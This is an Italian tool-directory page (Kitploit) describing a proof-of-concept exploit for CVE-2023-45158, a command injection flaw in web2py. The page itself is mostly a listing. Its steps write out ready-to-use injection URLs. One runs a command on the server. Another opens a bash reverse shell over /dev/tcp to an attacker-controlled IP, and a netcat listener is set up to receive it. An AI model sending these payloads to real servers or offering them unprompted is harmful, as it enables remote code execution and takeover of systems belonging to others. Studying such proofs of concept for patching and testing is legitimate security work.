Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-45158 — Exploit proof-of-concept per CVE-2023-45158, una vulnerabilità di command injection in web2py. Dimostra l'esecuzione di codice remoto tramite richieste HTTP appositamente create, inclusa la creazione di file e payload di reverse shell. | Kitploit
Strumenti/GitHubGitHub/yifanzhg/cve-2023-45158
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubyifanzhg/cve-2023-45158

CVE-2023-45158

Exploit proof-of-concept per CVE-2023-45158, una vulnerabilità di command injection in web2py. Dimostra l'esecuzione di codice remoto tramite richieste HTTP appositamente create, inclusa la creazione di file e payload di reverse shell.

Vedi Repository
412 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-45158

Passaggi

  1. Avvia il server web
root@kitploit:~
cd web2py
python3 web2py.py
  1. Inietta il tuo comando usando l'URL http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. Sostituisci <IP-ADDRESS> e <YOUR-COMMAND> con i tuoi valori.

Esempi

  1. Crea un file sul server

http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27

  1. Reverse shell

Sulla macchina dell'attaccante, esegui nc -l 127.0.0.1 8080

Vai all'URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. Sostituisci <ATTACKER-IP>.

Scarica lo strumento